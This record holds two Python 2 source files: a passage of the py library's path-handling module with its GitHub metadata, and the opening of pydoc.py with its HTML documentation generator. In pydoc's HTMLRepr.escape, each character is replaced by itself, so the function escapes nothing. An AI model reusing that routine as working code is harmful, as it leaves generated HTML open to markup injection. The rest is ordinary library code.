_depend_on_existence = 'exists', 'link', 'dir', 'file'
def __init__(self, path):
self.path = path
def dir(self):
raise NotImplementedError
def file(self):
raise NotImplementedError
def dotfile(self):
return self.path.basename.startswith('.')
def ext(self, arg):
if not arg.startswith('.'):
arg = '.' + arg
return self.path.ext == arg
def exists(self):
raise NotImplementedError
def basename(self, arg):
return self.path.basename == arg
def basestarts(self, arg):
return self.path.basename.startswith(arg)
def relto(self, arg):
return self.path.relto(arg)
def fnmatch(self, arg):
return self.path.fnmatch(arg)
def endswith(self, arg):
return str(self.path).endswith(arg)
def _evaluate(self, kw):
for name, value in kw.items():
invert = False
meth = None
try:
meth = getattr(self, name)
except AttributeError:
if name[:3] == 'not':
invert = True
try:
meth = getattr(self, name[3:])
except AttributeError:
pass
if meth is None:
raise TypeError(
"no %r checker available for %r" % (name, self.path))
try:
if py.code.getrawcode(meth).co_argcount > 1:
if (not meth(value)) ^ invert:
return False
else:
if bool(value) ^ bool(meth()) ^ invert:
return False
except (py.error.ENOENT, py.error.ENOTDIR, py.error.EBUSY):
# EBUSY feels not entirely correct,
# but its kind of necessary since ENOMEDIUM
# is not accessible in python
for name in self._depend_on_existence:
if name in kw:
if kw.get(name):
return False
name = 'not' + name
if name in kw:
if not kw.get(name):
return False
return True
class NeverRaised(Exception):
pass
class PathBase(object):
""" shared implementation for filesystem path objects."""
Checkers = Checkers
def __div__(self, other):
return self.join(str(other))
__truediv__ = __div__ # py3k
def basename(self):
""" basename part of path. """
return self._getbyspec('basename')[0]
basename = property(basename, None, None, basename.__doc__)
def dirname(self):
""" dirname part of path. """
return self._getbyspec('dirname')[0]
dirname = property(dirname, None, None, dirname.__doc__)
def purebasename(self):
""" pure base name of the path."""
return self._getbyspec('purebasename')[0]
purebasename = property(purebasename, None, None, purebasename.__doc__)
def ext(self):
""" extension of the path (including the '.')."""
return self._getbyspec('ext')[0]
ext = property(ext, None, None, ext.__doc__)
def dirpath(self, *args, **kwargs):
""" return the directory Path of the current Path joined
with any given path arguments.
"""
return self.new(basename='').join(*args, **kwargs)
def read_binary(self):
""" read and return a bytestring from reading the path. """
with self.open('rb') as f:
return f.read()
def read_text(self, encoding):
""" read and return a Unicode string from reading the path. """
with self.open("r", encoding=encoding) as f:
return f.read()
def read(self, mode='r'):
""" read and return a bytestring from reading the path. """
with self.open(mode) as f:
return f.read()
def readlines(self, cr=1):
""" read and return a list of lines from the path. if cr is False, the
newline will be removed from the end of each line. """
if not cr:
content = self.read('rU')
return content.split('\n')
else:
f = self.open('rU')
try:
return f.readlines()
finally:
f.close()
def load(self):
""" (deprecated) return object unpickled from self.read() """
f = self.open('rb')
try:
return py.error.checked_call(py.std.pickle.load, f)
finally:
f.close()
def move(self, target):
""" move this path to target. """
if target.relto(self):
raise py.error.EINVAL(target,
"cannot move path into a subdirectory of itself")
try:
self.rename(target)
except py.error.EXDEV: # invalid cross-device link
self.copy(target)
self.remove()
def __repr__(self):
""" return a string representation of this path. """
return repr(str(self))
def check(self, **kw):
""" check a path for existence and properties.
Without arguments, return True if the path exists, otherwise False.
valid checkers::
file=1 # is a file
file=0 # is not a file (may not even exist)
dir=1 # is a dir
link=1 # is a link
exists=1 # exists
You can specify multiple checker definitions, for example::
path.check(file=1, link=1) # a link pointing to a file
"""
if not kw:
kw = {'exists' : 1}
return self.Checkers(self)._evaluate(kw)
def fnmatch(self, pattern):
"""return true if the basename/fullname matches the glob-'pattern'.
valid pattern characters::
* matches everything
? matches any single character
[seq] matches any character in seq
[!seq] matches any char not in seq
If the pattern contains a path-separator then the full path
is used for pattern matching and a '*' is prepended to the
pattern.
if the pattern doesn't contain a path-separator the pattern
is only matched against the basename.
"""
return FNMatcher(pattern)(self)
def relto(self, relpath):
""" return a string which is the relative part of the path
to the given 'relpath'.
"""
if not isinstance(relpath, (str, PathBase)):
raise TypeError("%r: not a string or path object" %(relpath,))
strrelpath = str(relpath)
if strrelpath and strrelpath[-1] != self.sep:
strrelpath += self.sep
#assert strrelpath[-1] == self.sep
#assert strrelpath[-2] != self.sep
strself = str(self)
if sys.platform == "win32" or getattr(os, '_name', None) == 'nt':
if os.path.normcase(strself).startswith(
os.path.normcase(strrelpath)):
return strself[len(strrelpath):]
elif strself.startswith(strrelpath):
return strself[len(strrelpath):]
return ""
def ensure_dir(self, *args):
""" ensure the path joined with args is a directory. """
return self.ensure(*args, **{"dir": True})
def bestrelpath(self, dest):
""" return a string which is a relative path from self
(assumed to be a directory) to dest such that
self.join(bestrelpath) == dest and if not such
path can be determined return dest.
"""
try:
if self == dest:
return os.curdir
base = self.common(dest)
if not base: # can be the case on windows
return str(dest)
self2base = self.relto(base)
reldest = dest.relto(base)
if self2base:
n = self2base.count(self.sep) + 1
else:
n = 0
l = [os.pardir] * n
if reldest:
l.append(reldest)
target = dest.sep.join(l)
return target
except AttributeError:
return str(dest)
def exists(self):
return self.check()
def isdir(self):
return self.check(dir=1)
def isfile(self):
return self.check(file=1)
def parts(self, reverse=False):
""" return a root-first list of all ancestor directories
plus the path itself.
"""
current = self
l = [self]
while 1:
last = current
current = current.dirpath()
if last == current:
break
l.append(current)
if not reverse:
l.reverse()
return l
def common(self, other):
""" return the common part shared with the other path
or None if there is no common part.
"""
last = None
for x, y in zip(self.parts(), other.parts()):
if x != y:
return last
last = x
return last
def __add__(self, other):
""" return new path object with 'other' added to the basename"""
return self.new(basename=self.basename+str(other))
def __cmp__(self, other):
""" return sort value (-1, 0, +1). """
try:
return cmp(self.strpath, other.strpath)
except AttributeError:
return cmp(str(self), str(other)) # self.path, other.path)
def __lt__(self, other):
try:
return self.strpath < other.strpath
except AttributeError:
return str(self) < str(other)
def visit(self, fil=None, rec=None, ignore=NeverRaised, bf=False, sort=False):
""" yields all paths below the current one
fil is a filter (glob pattern or callable), if not matching the
path will not be yielded, defaulting to None (everything is
returned)
rec is a filter (glob pattern or callable) that controls whether
a node is descended, defaulting to None
ignore is an Exception class that is ignoredwhen calling dirlist()
on any of the paths (by default, all exceptions are reported)
bf if True will cause a breadthfirst search instead of the
default depthfirst. Default: False
sort if True will sort entries within each directory level.
"""
for x in Visitor(fil, rec, ignore, bf, sort).gen(self):
yield x
def _sortlist(self, res, sort):
if sort:
if hasattr(sort, '__call__'):
res.sort(sort)
else:
res.sort()
def samefile(self, other):
""" return True if other refers to the same stat object as self. """
return self.strpath == str(other)
class Visitor:
def __init__(self, fil, rec, ignore, bf, sort):
if isinstance(fil, str):
fil = FNMatcher(fil)
if isinstance(rec, str):
self.rec = FNMatcher(rec)
elif not hasattr(rec, '__call__') and rec:
self.rec = lambda path: True
else:
self.rec = rec
self.fil = fil
self.ignore = ignore
self.breadthfirst = bf
self.optsort = sort and sorted or (lambda x: x)
def gen(self, path):
try:
entries = path.listdir()
except self.ignore:
return
rec = self.rec
dirs = self.optsort([p for p in entries
if p.check(dir=1) and (rec is None or rec(p))])
if not self.breadthfirst:
for subdir in dirs:
for p in self.gen(subdir):
yield p
for p in self.optsort(entries):
if self.fil is None or self.fil(p):
yield p
if self.breadthfirst:
for subdir in dirs:
for p in self.gen(subdir):
yield p
class FNMatcher:
def __init__(self, pattern):
self.pattern = pattern
def __call__(self, path):
pattern = self.pattern
if (pattern.find(path.sep) == -1 and
iswin32 and
pattern.find(posixpath.sep) != -1):
# Running on Windows, the pattern has no Windows path separators,
# and the pattern has one or more Posix path separators. Replace
# the Posix path separators with the Windows path separator.
pattern = pattern.replace(posixpath.sep, path.sep)
if pattern.find(path.sep) == -1:
name = path.basename
else:
name = str(path) # path.strpath # XXX svn?
if not os.path.isabs(pattern):
pattern = '*' + path.sep + pattern
return py.std.fnmatch.fnmatch(name, pattern)
|
{
"content_hash": "02bb1d7a4a7672399c0e359c756709e9",
"timestamp": "",
"source": "github",
"line_count": 405,
"max_line_length": 82,
"avg_line_length": 32.306172839506175,
"alnum_prop": 0.5330174258636503,
"repo_name": "brandonium21/snowflake",
"id": "880ee79ab6b17055b35835b23f42df344bef86f5",
"size": "13084",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "snowflakeEnv/lib/python2.7/site-packages/py/_path/common.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "C",
"bytes": "5939"
},
{
"name": "CSS",
"bytes": "122922"
},
{
"name": "HTML",
"bytes": "51669"
},
{
"name": "JavaScript",
"bytes": "83828"
},
{
"name": "Mako",
"bytes": "7564"
},
{
"name": "Python",
"bytes": "11152216"
},
{
"name": "Shell",
"bytes": "3809"
}
],
"symlink_target": ""
}
|
"""Generate Python documentation in HTML or text for interactive use.
In the Python interpreter, do "from pydoc import help" to provide online
help. Calling help(thing) on a Python object documents the object.
Or, at the shell command line outside of Python:
Run "pydoc <name>" to show documentation on something. <name> may be
the name of a function, module, package, or a dotted reference to a
class or function within a module or module in a package. If the
argument contains a path segment delimiter (e.g. slash on Unix,
backslash on Windows) it is treated as the path to a Python source file.
Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines
of all available modules.
Run "pydoc -p <port>" to start an HTTP server on a given port on the
local machine to generate documentation web pages. Port number 0 can be
used to get an arbitrary unused port.
For platforms without a command line, "pydoc -g" starts the HTTP server
and also pops up a little window for controlling it.
Run "pydoc -w <name>" to write out the HTML documentation for a module
to a file named "<name>.html".
Module docs for core modules are assumed to be in
https://docs.python.org/library/
This can be overridden by setting the PYTHONDOCS environment variable
to a different URL or to a local directory containing the Library
Reference Manual pages.
"""
__author__ = "Ka-Ping Yee <ping@lfw.org>"
__date__ = "26 February 2001"
__version__ = "$Revision: 88564 $"
__credits__ = """Guido van Rossum, for an excellent programming language.
Tommy Burnette, the original creator of manpy.
Paul Prescod, for all his work on onlinehelp.
Richard Chamberlain, for the first implementation of textdoc.
"""
# Known bugs that can't be fixed here:
# - imp.load_module() cannot be prevented from clobbering existing
# loaded modules, so calling synopsis() on a binary module file
# changes the contents of any existing module with the same name.
# - If the __file__ attribute on a module is a relative path and
# the current directory is changed with os.chdir(), an incorrect
# path will be displayed.
import sys, imp, os, re, types, inspect, __builtin__, pkgutil, warnings
from repr import Repr
from string import expandtabs, find, join, lower, split, strip, rfind, rstrip
from traceback import extract_tb
try:
from collections import deque
except ImportError:
# Python 2.3 compatibility
class deque(list):
def popleft(self):
return self.pop(0)
# --------------------------------------------------------- common routines
def pathdirs():
"""Convert sys.path into a list of absolute, existing, unique paths."""
dirs = []
normdirs = []
for dir in sys.path:
dir = os.path.abspath(dir or '.')
normdir = os.path.normcase(dir)
if normdir not in normdirs and os.path.isdir(dir):
dirs.append(dir)
normdirs.append(normdir)
return dirs
def getdoc(object):
"""Get the doc string or comments for an object."""
result = inspect.getdoc(object) or inspect.getcomments(object)
result = _encode(result)
return result and re.sub('^ *\n', '', rstrip(result)) or ''
def splitdoc(doc):
"""Split a doc string into a synopsis line (if any) and the rest."""
lines = split(strip(doc), '\n')
if len(lines) == 1:
return lines[0], ''
elif len(lines) >= 2 and not rstrip(lines[1]):
return lines[0], join(lines[2:], '\n')
return '', join(lines, '\n')
def classname(object, modname):
"""Get a class name and qualify it with a module name if necessary."""
name = object.__name__
if object.__module__ != modname:
name = object.__module__ + '.' + name
return name
def isdata(object):
"""Check if an object is of a type that probably means it's data."""
return not (inspect.ismodule(object) or inspect.isclass(object) or
inspect.isroutine(object) or inspect.isframe(object) or
inspect.istraceback(object) or inspect.iscode(object))
def replace(text, *pairs):
"""Do a series of global replacements on a string."""
while pairs:
text = join(split(text, pairs[0]), pairs[1])
pairs = pairs[2:]
return text
def cram(text, maxlen):
"""Omit part of a string if needed to make it fit in a maximum length."""
if len(text) > maxlen:
pre = max(0, (maxlen-3)//2)
post = max(0, maxlen-3-pre)
return text[:pre] + '...' + text[len(text)-post:]
return text
_re_stripid = re.compile(r' at 0x[0-9a-f]{6,16}(>+)$', re.IGNORECASE)
def stripid(text):
"""Remove the hexadecimal id from a Python object representation."""
# The behaviour of %p is implementation-dependent in terms of case.
return _re_stripid.sub(r'\1', text)
def _is_some_method(obj):
return inspect.ismethod(obj) or inspect.ismethoddescriptor(obj)
def allmethods(cl):
methods = {}
for key, value in inspect.getmembers(cl, _is_some_method):
methods[key] = 1
for base in cl.__bases__:
methods.update(allmethods(base)) # all your base are belong to us
for key in methods.keys():
methods[key] = getattr(cl, key)
return methods
def _split_list(s, predicate):
"""Split sequence s via predicate, and return pair ([true], [false]).
The return value is a 2-tuple of lists,
([x for x in s if predicate(x)],
[x for x in s if not predicate(x)])
"""
yes = []
no = []
for x in s:
if predicate(x):
yes.append(x)
else:
no.append(x)
return yes, no
def visiblename(name, all=None, obj=None):
"""Decide whether to show documentation on a variable."""
# Certain special names are redundant.
_hidden_names = ('__builtins__', '__doc__', '__file__', '__path__',
'__module__', '__name__', '__slots__', '__package__')
if name in _hidden_names: return 0
# Private names are hidden, but special names are displayed.
if name.startswith('__') and name.endswith('__'): return 1
# Namedtuples have public fields and methods with a single leading underscore
if name.startswith('_') and hasattr(obj, '_fields'):
return 1
if all is not None:
# only document that which the programmer exported in __all__
return name in all
else:
return not name.startswith('_')
def classify_class_attrs(object):
"""Wrap inspect.classify_class_attrs, with fixup for data descriptors."""
def fixup(data):
name, kind, cls, value = data
if inspect.isdatadescriptor(value):
kind = 'data descriptor'
return name, kind, cls, value
return map(fixup, inspect.classify_class_attrs(object))
# ----------------------------------------------------- Unicode support helpers
try:
_unicode = unicode
except NameError:
# If Python is built without Unicode support, the unicode type
# will not exist. Fake one that nothing will match, and make
# the _encode function that do nothing.
class _unicode(object):
pass
_encoding = 'ascii'
def _encode(text, encoding='ascii'):
return text
else:
import locale
_encoding = locale.getpreferredencoding()
def _encode(text, encoding=None):
if isinstance(text, unicode):
return text.encode(encoding or _encoding, 'xmlcharrefreplace')
else:
return text
def _binstr(obj):
# Ensure that we have an encoded (binary) string representation of obj,
# even if it is a unicode string.
if isinstance(obj, _unicode):
return obj.encode(_encoding, 'xmlcharrefreplace')
return str(obj)
# ----------------------------------------------------- module manipulation
def ispackage(path):
"""Guess whether a path refers to a package directory."""
if os.path.isdir(path):
for ext in ('.py', '.pyc', '.pyo'):
if os.path.isfile(os.path.join(path, '__init__' + ext)):
return True
return False
def source_synopsis(file):
line = file.readline()
while line[:1] == '#' or not strip(line):
line = file.readline()
if not line: break
line = strip(line)
if line[:4] == 'r"""': line = line[1:]
if line[:3] == '"""':
line = line[3:]
if line[-1:] == '\\': line = line[:-1]
while not strip(line):
line = file.readline()
if not line: break
result = strip(split(line, '"""')[0])
else: result = None
return result
def synopsis(filename, cache={}):
"""Get the one-line summary out of a module file."""
mtime = os.stat(filename).st_mtime
lastupdate, result = cache.get(filename, (None, None))
if lastupdate is None or lastupdate < mtime:
info = inspect.getmoduleinfo(filename)
try:
file = open(filename)
except IOError:
# module can't be opened, so skip it
return None
if info and 'b' in info[2]: # binary modules have to be imported
try: module = imp.load_module('__temp__', file, filename, info[1:])
except: return None
result = module.__doc__.splitlines()[0] if module.__doc__ else None
del sys.modules['__temp__']
else: # text modules can be directly examined
result = source_synopsis(file)
file.close()
cache[filename] = (mtime, result)
return result
class ErrorDuringImport(Exception):
"""Errors that occurred while trying to import something to document it."""
def __init__(self, filename, exc_info):
exc, value, tb = exc_info
self.filename = filename
self.exc = exc
self.value = value
self.tb = tb
def __str__(self):
exc = self.exc
if type(exc) is types.ClassType:
exc = exc.__name__
return 'problem in %s - %s: %s' % (self.filename, exc, self.value)
def importfile(path):
"""Import a Python source file or compiled file given its path."""
magic = imp.get_magic()
file = open(path, 'r')
if file.read(len(magic)) == magic:
kind = imp.PY_COMPILED
else:
kind = imp.PY_SOURCE
file.close()
filename = os.path.basename(path)
name, ext = os.path.splitext(filename)
file = open(path, 'r')
try:
module = imp.load_module(name, file, path, (ext, 'r', kind))
except:
raise ErrorDuringImport(path, sys.exc_info())
file.close()
return module
def safeimport(path, forceload=0, cache={}):
"""Import a module; handle errors; return None if the module isn't found.
If the module *is* found but an exception occurs, it's wrapped in an
ErrorDuringImport exception and reraised. Unlike __import__, if a
package path is specified, the module at the end of the path is returned,
not the package at the beginning. If the optional 'forceload' argument
is 1, we reload the module from disk (unless it's a dynamic extension)."""
try:
# If forceload is 1 and the module has been previously loaded from
# disk, we always have to reload the module. Checking the file's
# mtime isn't good enough (e.g. the module could contain a class
# that inherits from another module that has changed).
if forceload and path in sys.modules:
if path not in sys.builtin_module_names:
# Avoid simply calling reload() because it leaves names in
# the currently loaded module lying around if they're not
# defined in the new source file. Instead, remove the
# module from sys.modules and re-import. Also remove any
# submodules because they won't appear in the newly loaded
# module's namespace if they're already in sys.modules.
subs = [m for m in sys.modules if m.startswith(path + '.')]
for key in [path] + subs:
# Prevent garbage collection.
cache[key] = sys.modules[key]
del sys.modules[key]
module = __import__(path)
except:
# Did the error occur before or after the module was found?
(exc, value, tb) = info = sys.exc_info()
if path in sys.modules:
# An error occurred while executing the imported module.
raise ErrorDuringImport(sys.modules[path].__file__, info)
elif exc is SyntaxError:
# A SyntaxError occurred before we could execute the module.
raise ErrorDuringImport(value.filename, info)
elif exc is ImportError and extract_tb(tb)[-1][2]=='safeimport':
# The import error occurred directly in this function,
# which means there is no such module in the path.
return None
else:
# Some other error occurred during the importing process.
raise ErrorDuringImport(path, sys.exc_info())
for part in split(path, '.')[1:]:
try: module = getattr(module, part)
except AttributeError: return None
return module
# ---------------------------------------------------- formatter base class
class Doc:
def document(self, object, name=None, *args):
"""Generate documentation for an object."""
args = (object, name) + args
# 'try' clause is to attempt to handle the possibility that inspect
# identifies something in a way that pydoc itself has issues handling;
# think 'super' and how it is a descriptor (which raises the exception
# by lacking a __name__ attribute) and an instance.
if inspect.isgetsetdescriptor(object): return self.docdata(*args)
if inspect.ismemberdescriptor(object): return self.docdata(*args)
try:
if inspect.ismodule(object): return self.docmodule(*args)
if inspect.isclass(object): return self.docclass(*args)
if inspect.isroutine(object): return self.docroutine(*args)
except AttributeError:
pass
if isinstance(object, property): return self.docproperty(*args)
return self.docother(*args)
def fail(self, object, name=None, *args):
"""Raise an exception for unimplemented types."""
message = "don't know how to document object%s of type %s" % (
name and ' ' + repr(name), type(object).__name__)
raise TypeError, message
docmodule = docclass = docroutine = docother = docproperty = docdata = fail
def getdocloc(self, object,
basedir=os.path.join(sys.exec_prefix, "lib",
"python"+sys.version[0:3])):
"""Return the location of module docs or None"""
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
docloc = os.environ.get("PYTHONDOCS",
"https://docs.python.org/library")
basedir = os.path.normcase(basedir)
if (isinstance(object, type(os)) and
(object.__name__ in ('errno', 'exceptions', 'gc', 'imp',
'marshal', 'posix', 'signal', 'sys',
'thread', 'zipimport') or
(file.startswith(basedir) and
not file.startswith(os.path.join(basedir, 'site-packages')))) and
object.__name__ not in ('xml.etree', 'test.pydoc_mod')):
if docloc.startswith(("http://", "https://")):
docloc = "%s/%s" % (docloc.rstrip("/"), object.__name__.lower())
else:
docloc = os.path.join(docloc, object.__name__.lower() + ".html")
else:
docloc = None
return docloc
# -------------------------------------------- HTML documentation generator
class HTMLRepr(Repr):
"""Class for safely making an HTML representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def escape(self, text):
return replace(text, '&', '&', '<', '<', '>', '>')
def repr(self, object):
return Repr.repr(self, object)
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return self.escape(cram(stripid(repr(x)), self.maxother))
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + self.escape(test) + testrepr[0]
return re.sub(r'((\\[\\abfnrtv\'"]|\\[0-9]..|\\x..|\\u....)+)',
r'<font color="#c040c0">\1</font>',
self.escape(testrepr))
repr_str = repr_string
def repr_instance(self, x, level):
try:
return self.escape(cram(stripid(repr(x)), self.maxstring))
except:
return self.escape('<%s instance>' % x.__class__.__name__)
repr_unicode = repr_string
class HTMLDoc(Doc):
"""Formatter class for HTML documentation."""
# ------------------------------------------- HTML formatting utilities
_repr_instance = HTMLRepr()
repr = _repr_instance.repr
escape = _repr_instance.escape
def page(self, title, contents):
"""Format an HTML page."""
return _encode('''
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Python: %s</title>
<meta charset="utf-8">
</head><body bgcolor="#f0f0f8">
%s
</body></html>''' % (title, contents), 'ascii')
def heading(self, title, fgcol, bgcol, extras=''):
"""Format a page heading."""
return '''
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="heading">
<tr bgcolor="%s">
<td valign=bottom> <br>
<font color="%s" face="helvetica, arial"> <br>%s</font></td
><td align=right valign=bottom
><font color="%s" face="helvetica, arial">%s</font></td></tr></table>
''' % (bgcol, fgcol, title, fgcol, extras or ' ')
def section(self, title, fgcol, bgcol, contents, width=6,
prelude='', marginalia=None, gap=' '):
"""Format a section with a heading."""
if marginalia is None:
marginalia = '<tt>' + ' ' * width + '</tt>'
result = '''<p>
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="%s">
<td colspan=3 valign=bottom> <br>
<font color="%s" face="helvetica, arial">%s</font></td></tr>
''' % (bgcol, fgcol, title)
if prelude:
result = result + '''
<tr bgcolor="%s"><td rowspan=2>%s</td>
<td colspan=2>%s</td></tr>
<tr><td>%s</td>''' % (bgcol, marginalia, prelude, gap)
else:
result = result + '''
<tr><td bgcolor="%s">%s</td><td>%s</td>''' % (bgcol, marginalia, gap)
return result + '\n<td width="100%%">%s</td></tr></table>' % contents
def bigsection(self, title, *args):
"""Format a section with a big heading."""
title = '<big><strong>%s</strong></big>' % title
return self.section(title, *args)
def preformat(self, text):
"""Format literal preformatted text."""
text = self.escape(expandtabs(text))
return replace(text, '\n\n', '\n \n', '\n\n', '\n \n',
' ', ' ', '\n', '<br>\n')
def multicolumn(self, list, format, cols=4):
"""Format a list of items into a multi-column list."""
result = ''
rows = (len(list)+cols-1)//cols
for col in range(cols):
result = result + '<td width="%d%%" valign=top>' % (100//cols)
for i in range(rows*col, rows*col+rows):
if i < len(list):
result = result + format(list[i]) + '<br>\n'
result = result + '</td>'
return '<table width="100%%" summary="list"><tr>%s</tr></table>' % result
def grey(self, text): return '<font color="#909090">%s</font>' % text
def namelink(self, name, *dicts):
"""Make a link for an identifier, given name-to-URL mappings."""
for dict in dicts:
if name in dict:
return '<a href="%s">%s</a>' % (dict[name], name)
return name
def classlink(self, object, modname):
"""Make a link for a class."""
name, module = object.__name__, sys.modules.get(object.__module__)
if hasattr(module, name) and getattr(module, name) is object:
return '<a href="%s.html#%s">%s</a>' % (
module.__name__, name, classname(object, modname))
return classname(object, modname)
def modulelink(self, object):
"""Make a link for a module."""
return '<a href="%s.html">%s</a>' % (object.__name__, object.__name__)
def modpkglink(self, data):
"""Make a link for a module or package to display in an index."""
name, path, ispackage, shadowed = data
if shadowed:
return self.grey(name)
if path:
url = '%s.%s.html' % (path, name)
else:
url = '%s.html' % name
if ispackage:
text = '<strong>%s</strong> (package)' % name
else:
text = name
return '<a href="%s">%s</a>' % (url, text)
def markup(self, text, escape=None, funcs={}, classes={}, methods={}):
"""Mark up some plain text, given a context of symbols to look for.
Each context dictionary maps object names to anchor names."""
escape = escape or self.escape
results = []
here = 0
pattern = re.compile(r'\b((http|ftp)://\S+[\w/]|'
r'RFC[- ]?(\d+)|'
r'PEP[- ]?(\d+)|'
r'(self\.)?(\w+))')
while True:
match = pattern.search(text, here)
if not match: break
start, end = match.span()
results.append(escape(text[here:start]))
all, scheme, rfc, pep, selfdot, name = match.groups()
if scheme:
url = escape(all).replace('"', '"')
results.append('<a href="%s">%s</a>' % (url, url))
elif rfc:
url = 'http://www.rfc-editor.org/rfc/rfc%d.txt' % int(rfc)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif pep:
url = 'http://www.python.org/dev/peps/pep-%04d/' % int(pep)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif selfdot:
# Create a link for methods like 'self.method(...)'
# and use <strong> for attributes like 'self.attr'
if text[end:end+1] == '(':
results.append('self.' + self.namelink(name, methods))
else:
results.append('self.<strong>%s</strong>' % name)
elif text[end:end+1] == '(':
results.append(self.namelink(name, methods, funcs, classes))
else:
results.append(self.namelink(name, classes))
here = end
results.append(escape(text[here:]))
return join(results, '')
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None):
"""Produce HTML for a class tree as given by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + '<dt><font face="helvetica, arial">'
result = result + self.classlink(c, modname)
if bases and bases != (parent,):
parents = []
for base in bases:
parents.append(self.classlink(base, modname))
result = result + '(' + join(parents, ', ') + ')'
result = result + '\n</font></dt>'
elif type(entry) is type([]):
result = result + '<dd>\n%s</dd>\n' % self.formattree(
entry, modname, c)
return '<dl>\n%s</dl>\n' % result
def docmodule(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a module object."""
name = object.__name__ # ignore the passed-in name
try:
all = object.__all__
except AttributeError:
all = None
parts = split(name, '.')
links = []
for i in range(len(parts)-1):
links.append(
'<a href="%s.html"><font color="#ffffff">%s</font></a>' %
(join(parts[:i+1], '.'), parts[i]))
linkedname = join(links + parts[-1:], '.')
head = '<big><big><strong>%s</strong></big></big>' % linkedname
try:
path = inspect.getabsfile(object)
url = path
if sys.platform == 'win32':
import nturl2path
url = nturl2path.pathname2url(path)
filelink = '<a href="file:%s">%s</a>' % (url, path)
except TypeError:
filelink = '(built-in)'
info = []
if hasattr(object, '__version__'):
version = _binstr(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
info.append('version %s' % self.escape(version))
if hasattr(object, '__date__'):
info.append(self.escape(_binstr(object.__date__)))
if info:
head = head + ' (%s)' % join(info, ', ')
docloc = self.getdocloc(object)
if docloc is not None:
docloc = '<br><a href="%(docloc)s">Module Docs</a>' % locals()
else:
docloc = ''
result = self.heading(
head, '#ffffff', '#7799ee',
'<a href=".">index</a><br>' + filelink + docloc)
modules = inspect.getmembers(object, inspect.ismodule)
classes, cdict = [], {}
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
(inspect.getmodule(value) or object) is object):
if visiblename(key, all, object):
classes.append((key, value))
cdict[key] = cdict[value] = '#' + key
for key, value in classes:
for base in value.__bases__:
key, modname = base.__name__, base.__module__
module = sys.modules.get(modname)
if modname != name and module and hasattr(module, key):
if getattr(module, key) is base:
if not key in cdict:
cdict[key] = cdict[base] = modname + '.html#' + key
funcs, fdict = [], {}
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all, object):
funcs.append((key, value))
fdict[key] = '#-' + key
if inspect.isfunction(value): fdict[value] = fdict[key]
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all, object):
data.append((key, value))
doc = self.markup(getdoc(object), self.preformat, fdict, cdict)
doc = doc and '<tt>%s</tt>' % doc
result = result + '<p>%s</p>\n' % doc
if hasattr(object, '__path__'):
modpkgs = []
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs.append((modname, name, ispkg, 0))
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
result = result + self.bigsection(
'Package Contents', '#ffffff', '#aa55cc', contents)
elif modules:
contents = self.multicolumn(
modules, lambda key_value, s=self: s.modulelink(key_value[1]))
result = result + self.bigsection(
'Modules', '#ffffff', '#aa55cc', contents)
if classes:
classlist = map(lambda key_value: key_value[1], classes)
contents = [
self.formattree(inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Classes', '#ffffff', '#ee77aa', join(contents))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Functions', '#ffffff', '#eeaa77', join(contents))
if data:
contents = []
for key, value in data:
contents.append(self.document(value, key))
result = result + self.bigsection(
'Data', '#ffffff', '#55aa55', join(contents, '<br>\n'))
if hasattr(object, '__author__'):
contents = self.markup(_binstr(object.__author__), self.preformat)
result = result + self.bigsection(
'Author', '#ffffff', '#7799ee', contents)
if hasattr(object, '__credits__'):
contents = self.markup(_binstr(object.__credits__), self.preformat)
result = result + self.bigsection(
'Credits', '#ffffff', '#7799ee', contents)
return result
def docclass(self, object, name=None, mod=None, funcs={}, classes={},
*ignored):
"""Produce HTML documentation for a class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
contents = []
push = contents.append
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('<hr>\n')
self.needone = 1
hr = HorizontalRule()
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
hr.maybe()
push('<dl><dt>Method resolution order:</dt>\n')
for base in mro:
push('<dd>%s</dd>\n' % self.classlink(base,
object.__module__))
push('</dl>\n')
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
push(self._docdescriptor(name, value, mod))
else:
push(self.document(value, name, mod,
funcs, classes, mdict, object))
push('\n')
return attrs
